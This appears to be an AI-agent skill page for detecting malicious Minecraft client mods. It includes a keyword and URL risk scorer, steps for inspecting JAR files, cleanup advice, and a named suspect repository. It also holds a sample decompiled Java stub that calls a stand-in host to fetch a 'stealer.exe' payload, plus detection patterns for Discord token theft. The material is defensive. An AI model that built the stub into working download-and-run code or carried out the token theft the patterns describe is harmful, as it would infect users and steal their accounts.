Loading...
Loading...
Analyze and understand Minecraft client modification security risks and malicious patterns
npx skill4agent add aradotso/devtools-skills minecraft-security-analysisSkill by ara.so — Devtools Skills collection.
# Example: Basic malware pattern detection
import re
import json
def analyze_minecraft_mod_repository(readme_content, metadata):
"""
Analyze a repository for common malware distribution patterns
"""
risk_score = 0
findings = []
# Check for suspicious keywords
malware_keywords = [
r'free\s+account',
r'hack',
r'crack',
r'keygen',
r'instant\s+download',
r'killaura',
r'vape.*crack',
r'wurst.*free'
]
for pattern in malware_keywords:
if re.search(pattern, readme_content, re.IGNORECASE):
risk_score += 10
findings.append(f"Suspicious keyword: {pattern}")
# Check for external download links (not GitHub releases)
external_links = re.findall(
r'https?://(?!github\.com|raw\.githubusercontent\.com)[\w\-\.]+\.\w+',
readme_content
)
if external_links:
risk_score += 25
findings.append(f"External download links: {external_links}")
# Check star-to-age ratio (unrealistic growth)
stars = metadata.get('stars', 0)
age_days = calculate_repo_age_days(metadata)
if age_days > 0 and (stars / age_days) > 50:
risk_score += 30
findings.append(f"Unrealistic star growth: {stars} stars in {age_days} days")
# Check for missing source code files
if metadata.get('language') == 'Unknown':
risk_score += 20
findings.append("No source code detected")
return {
'risk_score': min(risk_score, 100),
'risk_level': get_risk_level(risk_score),
'findings': findings
}
def calculate_repo_age_days(metadata):
from datetime import datetime
created = datetime.fromisoformat(metadata['created_at'].replace('Z', '+00:00'))
updated = datetime.fromisoformat(metadata['updated_at'].replace('Z', '+00:00'))
return (updated - created).days
def get_risk_level(score):
if score >= 75:
return "CRITICAL"
elif score >= 50:
return "HIGH"
elif score >= 25:
return "MEDIUM"
return "LOW"// Example: Check if download link is legitimate
async function validateMinecraftModSource(downloadUrl) {
const legitimateSources = [
'github.com',
'modrinth.com',
'curseforge.com',
'spigotmc.org',
'papermc.io'
];
const url = new URL(downloadUrl);
const isLegitimate = legitimateSources.some(
domain => url.hostname.endsWith(domain)
);
if (!isLegitimate) {
return {
safe: false,
reason: `Untrusted source: ${url.hostname}`,
recommendation: 'Do not download from this source'
};
}
// Check for direct file downloads vs. HTML pages
if (!downloadUrl.match(/\.(jar|zip)$/)) {
return {
safe: false,
reason: 'Link does not point to a mod file',
recommendation: 'Likely a phishing or malware distribution page'
};
}
return {
safe: true,
reason: 'Legitimate source and file type'
};
}# Safe sources for Minecraft mods:
# 1. CurseForge (official)
# https://www.curseforge.com/minecraft
# 2. Modrinth (open-source friendly)
# https://modrinth.com/
# 3. GitHub releases from verified projects
# Example: Fabric Mod Loader
git clone https://github.com/FabricMC/fabric.git
cd fabric
./gradlew build
# 4. Official mod loader sites
# Forge: https://files.minecraftforge.net/
# Fabric: https://fabricmc.net/# Extract and inspect JAR contents
mkdir mod_inspect
unzip -q suspicious_mod.jar -d mod_inspect/
# Check for obfuscated code (common in malware)
find mod_inspect/ -name "*.class" | head -5
# Look for suspicious network connections
strings suspicious_mod.jar | grep -E "http://|https://" | sort -u
# Check manifest
unzip -p suspicious_mod.jar META-INF/MANIFEST.MF
# Scan with antivirus
clamscan suspicious_mod.jar# checklist.py - Automated mod security review
import zipfile
import os
def review_minecraft_mod(jar_path):
"""
Perform basic security review of a Minecraft mod JAR
"""
checks = {
'has_source': False,
'has_manifest': False,
'suspicious_classes': [],
'network_calls': [],
'obfuscated_code': False
}
with zipfile.ZipFile(jar_path, 'r') as jar:
file_list = jar.namelist()
# Check for source files (good sign)
checks['has_source'] = any(f.endswith('.java') for f in file_list)
# Check for manifest
checks['has_manifest'] = 'META-INF/MANIFEST.MF' in file_list
# Look for suspicious class names
suspicious_patterns = [
'RAT', 'Trojan', 'Keylog', 'Stealer',
'Download', 'Inject', 'Hook'
]
for file in file_list:
if file.endswith('.class'):
for pattern in suspicious_patterns:
if pattern.lower() in file.lower():
checks['suspicious_classes'].append(file)
# Check for obfuscation (single-letter package names)
class_files = [f for f in file_list if f.endswith('.class')]
short_names = [f for f in class_files if len(os.path.basename(f)) <= 3]
if len(short_names) / max(len(class_files), 1) > 0.5:
checks['obfuscated_code'] = True
return checks
# Usage
result = review_minecraft_mod('suspicious_mod.jar')
print(f"Security Review Results:")
print(f" Has Source: {result['has_source']}")
print(f" Obfuscated: {result['obfuscated_code']}")
print(f" Suspicious Classes: {len(result['suspicious_classes'])}")CHARACTERISTICS:
- Claims to be "cracked" or "free" version of paid mods
- Download links to external sites (not GitHub releases)
- No visible source code
- Unrealistic feature claims
- Artificial star/fork inflation
EXAMPLE: This repository (Aegis-V4-Client-2026)// MALICIOUS PATTERN - Do not use
// Example of what malware looks like in decompiled mods
public class a { // Obfuscated class name
public static void b() { // Obfuscated method
try {
String c = "http://malicious-site.com/stealer.exe";
// Download and execute payload
java.net.URLConnection d = new java.net.URL(c).openConnection();
// ... infection code
} catch (Exception e) {}
}
}# DETECTION: Look for Discord token theft patterns
suspicious_patterns = [
r'discord.*token',
r'\.config.*discord',
r'roaming.*discord.*Local Storage',
r'leveldb.*ldb',
r'webhook.*discord\.com'
]
def scan_for_token_stealer(decompiled_code):
"""
Check decompiled mod code for token stealing patterns
"""
findings = []
for pattern in suspicious_patterns:
matches = re.finditer(pattern, decompiled_code, re.IGNORECASE)
for match in matches:
findings.append({
'pattern': pattern,
'location': match.span(),
'context': decompiled_code[max(0, match.start()-50):match.end()+50]
})
return findings# 1. Report the repository
# Visit: https://github.com/ochoaochoa330-design/Aegis-V4-Client-2026
# Click: "..." → "Report repository" → "Malware or phishing"
# 2. Warn community
# Post warnings on Minecraft forums, Discord servers
# 3. Use legitimate alternatives
# For client modifications, use:
# - Fabric: https://fabricmc.net/
# - Forge: https://minecraftforge.net/
# - OptiFine: https://optifine.net/# DO NOT download from this repository
# If you already downloaded:
# 1. Do NOT run the file
# 2. Delete immediately
rm -rf ~/Downloads/AuroraClient* ~/Downloads/Aegis*
# 3. Run antivirus scan
clamscan -r ~/Downloads/
# 4. Check for infection
# Linux/Mac:
ps aux | grep -E "java|minecraft" | grep -v grep
lsof -i -P | grep -i "listen"
# Windows (PowerShell):
# Get-Process | Where-Object {$_.Name -like "*java*"}
# netstat -ano | findstr LISTENING
# 5. Change passwords if mod was executed
# - Minecraft account
# - Discord
# - Email
# - Any other accounts# For security scanning tools
export MINECRAFT_MODS_PATH="$HOME/.minecraft/mods"
export SCAN_QUARANTINE_PATH="/tmp/minecraft_quarantine"
export VIRUSTOTAL_API_KEY="your_virustotal_api_key"# Use official Fabric template
git clone https://github.com/FabricMC/fabric-example-mod.git
cd fabric-example-mod
# Configure gradle.properties
cat > gradle.properties << EOF
minecraft_version=1.20.4
yarn_mappings=1.20.4+build.3
loader_version=0.15.3
fabric_version=0.91.1+1.20.4
EOF
# Build legitimate mod
./gradlew build
# Mod will be in build/libs/
ls -lh build/libs/*.jar